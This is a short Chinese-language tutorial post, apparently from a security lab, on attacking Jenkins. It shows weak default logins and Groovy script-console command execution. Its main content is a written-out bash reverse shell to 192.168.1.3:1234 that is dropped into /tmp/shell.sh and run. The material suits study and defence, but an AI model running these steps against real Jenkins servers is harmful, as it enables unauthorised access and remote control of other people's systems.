当前位置: 首页 > news >正文

web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

news 2025/7/8 21:35:43

web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

Jenkins弱口令

默认用户一般为jenkins/jenkins
在这里插入图片描述
在这里插入图片描述
使用admin/admin123登陆成功
在这里插入图片描述

Jenkins反弹shell

在这里插入图片描述
在这里插入图片描述
格式为 println"命令".execute().text
在这里插入图片描述
在/tmp目录中生成shell.sh文件,并向其中写入反弹shell的语句
new File(“/tmp/shell.sh”).write(‘bash -i >& /dev/tcp/192.168.1.3/1234 0>&1’
在这里插入图片描述

println “ls-al/tmp/shell.sh”.execute().text
在这里插入图片描述
攻击机nc监听1234端口,使用sh命令执行服务器上的脚本进行反弹shell,println"sh/tmp/shell.sh".execute().text
在这里插入图片描述
在这里插入图片描述

http://www.lryc.cn/news/379640.html

相关文章:

  • Linux开发讲课9--- Linux的IPC机制-内存映射(Memory Mapping)
  • Java赋值运算符
  • Qt做群控系统
  • 【专业英语 复习】第10章 Information System
  • 09-axios在Vue中的导入与配置
  • odoo17 小变更4
  • Flink assignTimestampsAndWatermarks 深度解析:时间语义与水印生成
  • C++排序算法——合并有序数组
  • 安装pytorch环境
  • 内卷从古到今就一直存在,并不是近年的“新物”,破局在于你是否有意识地学习。
  • 跟《经济学人》学英文:2024年6月15日这期 The war for AI talent is heating up
  • 港湾周评|高盛眼中的618增长
  • SPSS知识
  • 【网络安全的神秘世界】关于Linux中一些好玩的字符游戏
  • 【LeetCode】Hot100:验证二叉搜索树
  • [Qt] Qt Creator 编译输出乱码,问题页中的报错、警告内容,编译输出乱码
  • sed
  • C++一文讲透thread中的detach和join的差别
  • 当Windows台式电脑或笔记本电脑随机关机时,请先从这8个方面检查
  • 【凤凰房产-注册安全分析报告-缺少轨迹的滑动条】
  • 【建议收藏】逻辑回归面试题,机器学习干货、重点。
  • C++使用教程
  • k8s volcano + deepspeed多机训练 + RDMA ROCE+ 用户权限安全方案【建议收藏】
  • 设计模式(七)创建者模式之建造者模式
  • # class中的__call__方法解析
  • React逻辑复用的方式都有哪些
  • 【LinuxC语言】线程重入
  • 【Streamlit学习笔记】Streamlit-ECharts箱型图添加均值和最值label
  • Docker镜像仓库:存储与分发Docker镜像的中央仓库
  • FreeRTOS必考面试题及参考答案